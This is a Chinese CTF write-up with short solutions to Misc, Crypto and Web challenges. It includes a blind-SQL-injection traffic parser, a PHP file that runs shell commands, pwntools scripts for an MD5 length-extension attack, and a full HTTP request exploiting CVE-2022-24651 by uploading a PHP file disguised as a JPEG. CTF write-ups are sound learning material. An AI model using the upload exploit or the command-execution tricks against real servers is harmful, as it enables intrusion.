Misc

1.sqlshark

wireshark导出所有http包为json。然后写个脚本筛选即可。

from json import * r = loads(open("res.json","r",encoding="utf-8").read()) res = [] for i in range(0,len(r),2): t = list(r[i]["_source"]["layers"]["urlencoded-form"].keys())[-1] if "correct" not in list(r[i+1]["_source"]["layers"]["data-text-lines"].keys())[-1]: if "if(((((ord(substr((select(group_concat(password))from(users)) from" in r[i]["_source"]["layers"]["urlencoded-form"][t]["urlencoded-form.value"].lower(): res.append(r[i]["_source"]["layers"]["urlencoded-form"][t]["urlencoded-form.value"].lower() .replace("any'/**/or/**/(if(((((ord(substr((select(group_concat(password))from(users)) from ","") .replace("))),1,0))#","").replace(" for 1))))in(",",")) for i in res: i = i.split(",") print(chr(int(i[-1])),end="")

2.OnlyLocalSql

ssh连上。

cd /var/www/html cat << EOF >> flag.php <?php echo `ls /f*`; EOF curl http://localhost:80

即可。

也可以加个ssh -L 转发到本地但是没必要()

3.LearnOpenGL

感觉我的是非预期啊

shaders包中,去掉spriteparticle然后打开就能直接看到了()

4.ez_msb

249=>11111001。

数据在第二位放着。主要问题是msb。并不是很想用python写一个实现出来于是直接用了GNU Radio Companion

5.问卷调查

下次还填非常简单。

Crypto

1.SignAhead

md5长度扩展攻击。

hashpump编译不起然后找到了另外一个

from pwn import * import HashTools context.log_level = 'info' P = remote("manqiu.top",20924) md5 = HashTools.MD5() for i in range(100): P.readline() msg = bytes.fromhex(P.readline().decode().split(":")[1].strip()) print("[*] msg:",msg) sign = P.readline().decode().split(":")[1].strip() print("[*] sign:",sign) md5 = HashTools.MD5() P.readline() nmsg , nsign = md5.extension(32,msg,b"233",signature=sign) print("[*] nmsg:",nmsg.hex()) print("[*] nsign:",nsign) P.sendlineafter(b": ",nmsg.hex().encode()) P.sendlineafter(b": ",nsign.encode()) print(P.readline()) print(P.recvline()) P.close()

2.basiccry

传进去一个超递增/递减序列然后可以直接得到某一行的值。

from pwn import * context.log_level = 'info' P = remote("manqiu.top",21175) r = "".join(str(i)+"," for i in [2**i for i in range(255,-1,-1)]).encode() r = r[:-1] P.sendlineafter(b":",r) cc = [] for i in range(256): l = [] v = (P.recvline().decode().strip('\n')).strip().strip('[]').split(' ') for _ in v: if(_=='1' or _=='0'): l.append(int(_)) cc.append(l) l = [] v = (P.recvline().decode().strip('\n')).strip('()').split(',') v = [int(i) for i in v] P.close() l = [] r = 2**255 d = v[0] r = 2**255 ans = "" while r != 0: if d >= r: d -= r ans += "1" else: ans += "0" r //= 2 cc = list(cc[0]) for i in range(len(cc)): cc[i] -= int(ans[i]) cc[i] = cc[i] % 2 for i in range(0,len(list(cc)),8): print(chr(int("".join(map(str,list(cc[i:i+8]))),2)),end="")

Web

1.Checkin

直接F12然后在game.js中发现变量_0x3d9d

2.TrySent

CVE-2022-24651

POST /user/upload/upload HTTP/1.1 Host: target.com Cookie: PHPSESSID=7901b5229557c94bad46e16af23a3728 Content-Length: 894 Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97" Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz Accept: */* Origin: https://info.ziwugu.vip/ Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://target.com/user/upload/index?name=icon&type=image&limit=1 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,ja-CN;q=0.8,ja;q=0.7,en;q=0.6 Connection: close ------WebKitFormBoundaryrhx2kYAMYDqoTThz Content-Disposition: form-data; name="id" WU_FILE_0 ------WebKitFormBoundaryrhx2kYAMYDqoTThz Content-Disposition: form-data; name="name" test.jpg ------WebKitFormBoundaryrhx2kYAMYDqoTThz Content-Disposition: form-data; name="type" image/jpeg ------WebKitFormBoundaryrhx2kYAMYDqoTThz Content-Disposition: form-data; name="lastModifiedDate" Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间) ------WebKitFormBoundaryrhx2kYAMYDqoTThz Content-Disposition: form-data; name="size" 164264 ------WebKitFormBoundaryrhx2kYAMYDqoTThz Content-Disposition: form-data; name="file"; filename="test.php" Content-Type: image/jpeg JFIF <?php RCE;?> ------WebKitFormBoundaryrhx2kYAMYDqoTThz--

3.codefever_again

https://github.com/PGYER/codefever/issues/140